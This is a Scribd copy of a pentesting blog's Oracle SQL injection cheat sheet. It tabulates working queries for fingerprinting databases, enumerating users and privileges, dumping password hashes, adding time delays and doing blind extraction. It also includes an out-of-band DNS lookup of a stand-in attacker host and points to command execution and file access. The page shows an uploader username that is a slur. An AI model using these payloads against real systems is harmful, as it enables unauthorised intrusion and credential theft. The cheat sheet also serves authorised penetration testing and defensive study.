Location via proxy:   [ UP ]  
[Report a bug]   [Manage cookies]                
Scribd
Upload
5 views

Oracle SQL Injection Cheat Sheet

The document is an Oracle SQL Injection Cheat Sheet that provides useful syntax reminders for exploiting Oracle databases. It includes various SQL queries for tasks such as listing users, privileges, and databases, as well as tips for executing commands and making DNS requests. The cheat sheet is part of a series aimed at simplifying SQL injection techniques across different database backends.

Uploaded by

faggotkilla
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
5 views

Oracle SQL Injection Cheat Sheet

The document is an Oracle SQL Injection Cheat Sheet that provides useful syntax reminders for exploiting Oracle databases. It includes various SQL queries for tasks such as listing users, privileges, and databases, as well as tips for executing commands and making DNS requests. The cheat sheet is part of a series aimed at simplifying SQL injection techniques across different database backends.

Uploaded by

faggotkilla
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 5

pentestmonkey

Taking the monkey work out of pentesting

Oracle SQL Injection Cheat Sheet


Some useful syntax reminders for SQL Injection into Oracle databases…
Categories
This post is part of a series of SQL Injection Cheat Sheets. In this series, I’ve endevoured to tabulate the data to make it
Blog (78) easier to read and to use the same table for for each database backend. This helps to highlight any features which are
Cheat Sheets (10) lacking for each database, and enumeration techniques that don’t apply and also areas that I haven’t got round to
researching yet.
Shells (1)
SQL Injection (7) The complete list of SQL Injection Cheat Sheets I’m working is:

Oracle
Contact (2)
MSSQL
Site News (3) MySQL
Tools (17) PostgreSQL
Ingres
Audit (3) DB2
Misc (7) Informix
User Enumeration (4) I’m not planning to write one for MS Access, but there’s a great MS Access Cheat Sheet here.
Web Shells (3)
Some of the queries in the table below can only be run by an admin. These are marked with “– priv” at the end of the
query.
Uncategorized (3)
Yaptest (15) Version SELECT banner FROM v$version WHERE banner LIKE ‘Oracle%’;
Front End (1) SELECT banner FROM v$version WHERE banner LIKE ‘TNS%’;
SELECT version FROM v$instance;
Installing (2)
Overview (2) Comments SELECT 1 FROM dual — comment
Using (8) – NB: SELECT statements must have a FROM clause in Oracle so we have to use the
dummy table name ‘dual’ when we’re not actually selecting from a table.

RSS Feed Current User SELECT user FROM dual

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
List Users SELECT username FROM all_users ORDER BY username;
SELECT name FROM sys.user$; — priv

List Password SELECT name, password, astatus FROM sys.user$ — priv, <= 10g. astatus tells you if
Hashes acct is locked
SELECT name,spare4 FROM sys.user$ — priv, 11g

Password checkpwd will crack the DES-based hashes from Oracle 8, 9 and 10.
Cracker

List Privileges SELECT * FROM session_privs; — current privs


SELECT * FROM dba_sys_privs WHERE grantee = ‘DBSNMP’; — priv, list a user’s privs
SELECT grantee FROM dba_sys_privs WHERE privilege = ‘SELECT ANY
DICTIONARY’; — priv, find users with a particular priv
SELECT GRANTEE, GRANTED_ROLE FROM DBA_ROLE_PRIVS;

List DBA SELECT DISTINCT grantee FROM dba_sys_privs WHERE ADMIN_OPTION = ‘YES’; —
Accounts priv, list DBAs, DBA roles

Current SELECT global_name FROM global_name;


Database SELECT name FROM v$database;
SELECT instance_name FROM v$instance;
SELECT SYS.DATABASE_NAME FROM DUAL;

List Databases SELECT DISTINCT owner FROM all_tables; — list schemas (one per user)
– Also query TNS listener for other databases. See tnscmd (services | status).

List Columns SELECT column_name FROM all_tab_columns WHERE table_name = ‘blah’;


SELECT column_name FROM all_tab_columns WHERE table_name = ‘blah’ and owner
= ‘foo’;

List Tables SELECT table_name FROM all_tables;


SELECT owner, table_name FROM all_tables;

Find Tables SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE
From Column ‘%PASS%’; — NB: table names are upper case
Name

Select Nth SELECT username FROM (SELECT ROWNUM r, username FROM all_users ORDER
Row BY username) WHERE r=9; — gets 9th row (rows numbered from 1)

Select Nth SELECT substr(‘abcd’, 3, 1) FROM dual; — gets 3rd character, ‘c’

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Char

Bitwise AND SELECT bitand(6,2) FROM dual; — returns 2


SELECT bitand(6,1) FROM dual; — returns0

ASCII Value -> SELECT chr(65) FROM dual; — returns A


Char

Char -> ASCII SELECT ascii(‘A’) FROM dual; — returns 65


Value

Casting SELECT CAST(1 AS char) FROM dual;


SELECT CAST(’1′ AS int) FROM dual;

String SELECT ‘A’ || ‘B’ FROM dual; — returns AB


Concatenation

If Statement BEGIN IF 1=1 THEN dbms_lock.sleep(3); ELSE dbms_lock.sleep(0); END IF; END; —
doesn’t play well with SELECT statements

Case SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END FROM dual; — returns 1
Statement SELECT CASE WHEN 1=2 THEN 1 ELSE 2 END FROM dual; — returns 2

Avoiding SELECT chr(65) || chr(66) FROM dual; — returns AB


Quotes

Time Delay BEGIN DBMS_LOCK.SLEEP(5); END; — priv, can’t seem to embed this in a SELECT
SELECT UTL_INADDR.get_host_name(’10.0.0.1′) FROM dual; — if reverse looks are
slow
SELECT UTL_INADDR.get_host_address(‘blah.attacker.com’) FROM dual; — if forward
lookups are slow
SELECT UTL_HTTP.REQUEST(‘http://google.com’) FROM dual; — if outbound TCP is
filtered / slow
– Also see Heavy Queries to create a time delay

Make DNS SELECT UTL_INADDR.get_host_address(‘google.com’) FROM dual;


Requests SELECT UTL_HTTP.REQUEST(‘http://google.com’) FROM dual;

Command Javacan be used to execute commands if it’s installed.ExtProc can sometimes be used
Execution too, though it normally failed for me.

Local File UTL_FILE can sometimes be used. Check that the following is non-null:

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Access SELECT value FROM v$parameter2 WHERE name = ‘utl_file_dir’;Java can be used to
read and write files if it’s installed (it is not available in Oracle Express).

Hostname, IP SELECT UTL_INADDR.get_host_name FROM dual;


Address SELECT host_name FROM v$instance;
SELECT UTL_INADDR.get_host_address FROM dual; — gets IP address
SELECT UTL_INADDR.get_host_name(’10.0.0.1′) FROM dual; — gets hostnames

Location of DB SELECT name FROM V$DATAFILE;


files

Default/System SYSTEM
Databases SYSAUX

Misc Tips
In no particular order, here are some suggestions from pentestmonkey readers.

From Christian Mehlmauer:

Get all select rtrim(xmlagg(xmlelement(e, table_name || ‘,’)).extract(‘//text()’).extract(‘//text()’) ,’,')


tablenames from all_tables – when using union based SQLI with only one row
in one
string

Blind SQLI order by case when ((select 1 from user_tables where substr(lower(table_name), 1, 1) = ‘a’
in order by and rownum = 1)=1) then column_name1 else column_name2 end — you must know 2
clause column names with the same datatype

Tags: cheatsheet, database, oracle, pentest, sqlinjection

Posted in SQL Injection

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD

You might also like